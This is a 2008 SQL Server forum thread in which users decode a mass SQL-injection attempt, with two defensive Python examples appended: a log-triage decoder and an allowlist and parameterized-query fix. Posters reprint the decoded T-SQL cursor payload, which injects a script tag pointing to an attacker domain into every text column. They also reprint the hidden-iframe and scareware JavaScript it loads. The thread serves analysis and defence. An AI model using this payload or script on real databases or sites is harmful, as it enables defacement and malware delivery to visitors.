SQL Server Forum / DB Engine / SQL Server / July 2008

SQL injection attempt

nutso fasst - 01 Jul 2008 00:48 GMT
Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
what the code in the querystring is trying to do?

?o=asc;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056[...]%20AS%20VARCHAR(4000));EXEC(@S);-

thx,

nf
Ed Enstrom - 01 Jul 2008 01:34 GMT
> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
>
> thx,
>
> nf

See if this helps:

http://isc.sans.org/diary.html?storyid=4565&rss
nutso fasst - 01 Jul 2008 02:14 GMT
> See if this helps:
>
> http://isc.sans.org/diary.html?storyid=4565&rss

Thanks for the quick reply.

Same nasty work. I wonder why this destructive behavior isn't prosecuted.
Surely the perps can be tracked.
TheSQLGuru - 01 Jul 2008 14:20 GMT
That isn't nearly as easy as you think.  It is very simple to hide your
tracks on the internet.  For example, you can simply take over another's
computer via a zombie program and have THAT machine execute the exploits.

Kevin G. Boles
Indicium Resources, Inc.
SQL Server MVP
kgboles a earthlink dt net

>> See if this helps:
>>
[quoted text clipped - 4 lines]
> Same nasty work. I wonder why this destructive behavior isn't prosecuted.
> Surely the perps can be tracked.
nutso fasst - 01 Jul 2008 18:27 GMT
> That isn't nearly as easy as you think.  It is very simple to hide your
> tracks on the internet.  For example, you can simply take over another's
> computer via a zombie program and have THAT machine execute the exploits.

Zombies are attempting the injection. But the injection leads to a website
with a custom domain name selling software (not to mention the various
domains hosting the .js files, which look to be all resident on nefarious
ISPs). At the least there's malicious defacing of property - I see it as
extortion. It's costing untold $millions in human resources (and mental
health issues). And if the perps are zombizing systems then it's a national
security issue.
TheSQLGuru - 01 Jul 2008 22:20 GMT
All of your statements may or may not be true, but they are completely
irrelevant and useless unless you can identify and successfully prosecute a
person, party or company for the act(s).  Even if you were able to do that
(at enormous cost that would almost certainly NOT be recouped by a
successful suit), there would be countless others still functional that
would not be worried in the least.

Now, if you were to post a youtube video of the torture and subsequent
execution of said offending parties (I am not suggesting this as a solution,
btw), that MIGHT generate enough fear to make the hackers stop, but I doubt
that again simply due to the extremely small likelihood that they can be
identified.  I don't think any remediation is possible until we can improve
the ability to track down perps.  Best is for people to simply build apps
that don't allow for this kind of attack.  Also to develop better ways of
identifying the attacks from their source and stopping that.

Kevin G. Boles
Indicium Resources, Inc.
SQL Server MVP
kgboles a earthlink dt net

>> That isn't nearly as easy as you think.  It is very simple to hide your
>> tracks on the internet.  For example, you can simply take over another's
[quoted text clipped - 8 lines]
> national
> security issue.
nutso fasst - 01 Jul 2008 23:25 GMT
> Now, if you were to post a youtube video of the torture and subsequent
> execution of said offending parties...

My guess is that many otherwise-'civilized' folks can't help but find that
scenario appealing. But I too doubt it would solve the problem. So, we
fritter time implementing countermeasures, contemplate bandwidth blocked
with sewage, and wonder where to store the stinking bloated log files...

Thanks for replying.
nutso fasst - 01 Jul 2008 02:04 GMT
I wrote:
> Can anyone tell
> what the code in the querystring is trying to do?

Never mind. I found a conversion tool:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND
a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=http://www.dl251.com/b.js></script>''') FETCH NEXT FROM Table_Cursor
INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Fortunately, this could not exec on my system. But once they start the
clowns just never give up. I checked a couple more querystrings, the only
difference is the domain name where the javascript is stored. 2 were
registered with DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A
PUBLICDOMAINREGISTRY.COM and another with XIN NET TECHNOLOGY CORPORATION.
Neither ISP has contact info. The javascript tries to put an iframe on the
page, with content from kadport.com/cgi-bin/index.cgi?ad. I did not look to
see what is dispensed from that script.

nf
Bob Milutinovic - 01 Jul 2008 02:28 GMT
> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
>
> ?o=asc;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056

<snip>

This is the decoded output; it appears to be a script to traverse the
database 'n' populate all string columns with a reference to a malicious
script;

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=http://www.dl251.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor

The culprit here's located at www.dl251.com, hosted on a botnet.

The output of the injected JavaScript is;

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://pid76.net/cgi-bin/index.cgi?ad width=0
height=0 frameborder=0></iframe>");
}
catch(e)
{
};

This points us to pid76.net, surprise surprise, another botnet-hosted
domain.

The common link here is a GoogleMail drop-box (likely irrelevant, but I do
like making these drop-boxes available for spam scrapers),
onlymailru@gmail.com

Now, onto the payload itself...

http://pid76.net/cgi-bin/index.cgi?ad redirects to
http://pid76.net/cgi-bin/ad.cgi

This in turn throws out an embedded JavaScript, which eventually leads us to
our real culprits, malware vendors selling bogus software by infecting the
victim's computer then offering to clean it for a fee;

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatead=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "updatead=update;expires="+expires.toGMTString();
try{
if((navigator.userLanguage.toLowerCase() ==
"en-us")||(if(navigator.userLanguage.toLowerCase() == "en"))) {
 w=window.open("http://spyware-quick-scan.com?wmid=1041&l=14&it=1&s=4t","w","location=0,status=0,toolbar=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=750,height=770");
 w.moveTo(0,0);
}
}
catch(e)
{
};

spyware-quick-scan.com is hosted by APS Telecom, a known spam/scam/malware
haven.

Domain registration is, as would be expected, entirely bogus (though in this
instance they didn't even attempt to hide the fact with fake data);

Domain Name: SPYWARE-QUICK-SCAN.COM
Registrant:
   n/a
   Shmid        (shmid@mikitos.com)
   n/a
   n/a
   n/a
   n/a
   ,000000
   US
   Tel. +999.999999999

I've lodged a complaint with the registrar in question, but even if action's
taken, I'm sure it won't cripple the perpetrators for longer than a few
hours.

- Bob.
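The decoding Bob and nutso did by hand (hex CAST literal out of the querystring, then reading the T-SQL) can be scripted for log triage. This is an added example, not code from the thread; the querystring it decodes is a constructed sample in the same shape as the one posted, with a short hex blob standing in for the original's few thousand digits, and the indicator list is taken from the decoded payload above.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the thread's querystring. The hex blob
# encodes only a fragment of the decoded cursor payload, not the full original.
CURSOR_FRAGMENT = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id"
)
SAMPLE_QUERY = (
    "o=asc;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + CURSOR_FRAGMENT.encode("ascii").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);--"
)

# CAST(0x<hex> AS VARCHAR) or AS NVARCHAR; the declared type decides how to decode the bytes.
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)

# Strings present in the decoded payload from the thread that a benign request would not carry.
INDICATORS = ("sysobjects", "syscolumns", "cursor", "exec(", "<script", "declare @")


def decode_hex_casts(raw_query):
    """Return the plaintext of every hex literal smuggled through CAST(0x... AS [N]VARCHAR)."""
    decoded = []
    for hexdigits, sqltype in HEX_CAST_RE.findall(unquote(raw_query)):
        if len(hexdigits) % 2:
            continue  # odd digit count cannot be a byte string; leave it for manual review
        data = bytes.fromhex(hexdigits)
        # NVARCHAR literals are UTF-16LE; VARCHAR ones are single-byte (latin-1 never fails).
        codec = "utf-16-le" if sqltype.upper().startswith("N") else "latin-1"
        decoded.append(data.decode(codec, errors="replace"))
    return decoded


def triage(raw_query):
    """Decode hidden payloads and report which known indicators the request contains."""
    payloads = decode_hex_casts(raw_query)
    haystack = (unquote(raw_query) + " " + " ".join(payloads)).lower()
    hits = [s for s in INDICATORS if s in haystack]
    return {"payloads": payloads, "indicators": hits, "suspicious": bool(hits)}


if __name__ == "__main__":
    report = triage(SAMPLE_QUERY)
    for text in report["payloads"]:
        print("decoded:", text)
    print("indicators:", report["indicators"])
```

Run it over the querystring column of the IIS logs rather than the rendered page: the hex literal is what the log captures, and the decoded text is what tells you whether the request got past the application.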
nutso fasst - 01 Jul 2008 03:53 GMT
> I've lodged a complaint with the registrar in question, but even if action's
> taken, I'm sure it won't cripple the perpetrators for longer than a few
> hours.

Thanks. It's hard to believe the registrar isn't complicit, and even harder
to believe that profit from software sales is the real reason for doing it.
Uri Dimant - 01 Jul 2008 05:08 GMT
Hi
See Tony's article  as well
http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/06/28/if-only-you-d-used-stored-procedures-you-wouldn-t-have-got-hacked.aspx


> Uh Oh. My server's been getting hit with these for weeks. Can anyone tell
> what the code in the querystring is trying to do?
[quoted text clipped - 18 lines]
>
> nf
nutso fasst - 01 Jul 2008 18:08 GMT
> Hi
> See Tony's article  as well

http://sqlblogcasts.com/blogs/tonyrogerson/archive/2008/06/28/if-only-you-d-used-stored-procedures-you-wouldn-t-have-got-hacked.aspx

Thanks Uri. Parameterized queries are another option:
<http://weblogs.asp.net/bleroy/archive/2004/08/18/please-please-please-learn-about-injection-attacks.aspx>

And, of course: never use key words such as asc and desc directly from a
querystring or post without checking.

Posting here has been very educational.
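The closing advice in the thread (parameterize the data values, and never splice `asc`/`desc` from the querystring straight into the SQL) combined in one place, as an added example rather than code from any poster. A sort direction cannot be a bound parameter, so it goes through a fixed allowlist; the filter value is bound. The example assumes sqlite3 as an offline stand-in for SQL Server (the same shape applies with ADO.NET or pyodbc parameters); note that SQL Server executes the stacked `;DECLARE ...` statements the allowlist rejects here, which is why the check matters.

```python
import sqlite3

# Fixed keywords the application is willing to splice into ORDER BY; anything else is rejected.
ALLOWED_SORT = {"asc": "ASC", "desc": "DESC"}

# Constructed stand-in for the thread's ?o= value (the hex blob shortened to a placeholder).
ATTACK_VALUE = "asc;DECLARE @S VARCHAR(4000);SET @S=CAST(0xPLACEHOLDER AS VARCHAR(4000));EXEC(@S);--"


def validate_sort_direction(value):
    """Map user input to one of the allowlisted keywords, or raise ValueError."""
    key = (value or "").strip().lower()
    if key not in ALLOWED_SORT:
        raise ValueError("rejected sort direction: %r" % value)
    return ALLOWED_SORT[key]


def sort_direction_accepted(value):
    """True if the allowlist would let this value through (useful when logging rejects)."""
    try:
        validate_sort_direction(value)
        return True
    except ValueError:
        return False


def fetch_products(conn, category, order):
    """ORDER BY direction comes from the allowlist; the filter value is a bound parameter."""
    direction = validate_sort_direction(order)
    sql = "SELECT name FROM products WHERE category = ? ORDER BY name " + direction
    return [row[0] for row in conn.execute(sql, (category,))]


def demo_db():
    """In-memory sample table (constructed data) so fetch_products can be exercised offline."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products(name TEXT, category TEXT);"
        "INSERT INTO products VALUES ('widget','tools'),('anvil','tools'),('apple','food');"
    )
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print(fetch_products(conn, "tools", "desc"))   # ['widget', 'anvil']
    print(sort_direction_accepted(ATTACK_VALUE))   # False
```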
 